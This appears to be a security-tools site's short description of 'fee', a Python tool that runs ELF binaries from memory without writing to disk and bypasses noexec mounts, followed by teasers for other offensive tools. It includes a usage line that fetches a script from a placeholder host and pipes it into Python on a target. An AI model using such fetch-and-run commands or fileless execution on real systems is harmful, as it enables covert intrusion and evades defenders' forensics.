This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).
This makes it possible to execute binaries without leaving traces on the disk.
The technique used for this is explained here.
With default options for each interpreter, running binaries using fee does not write to disk whatsoever. This can be verified using tools such as strace.
fee also completely ignores and bypasses noexec mount flags, even if they were set on /proc.
memfd_create support)Install this on your host machine using pipx:
$ pipx install fee… or regular pip:
$ pip install --user feeYou may also clone this repository and run the script directly.
Basic usage: supply the path to the binary you wish to drop:
$ fee /path/to/binary > output.pyYou can then pipe this into Python on the target:
$ curl my.example.site/output.py | pythonFor more information click here.
How Does a Firewall Work Step by Step? What Is a Firewall and How Does…
ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…
Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…
SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…
PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…
HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…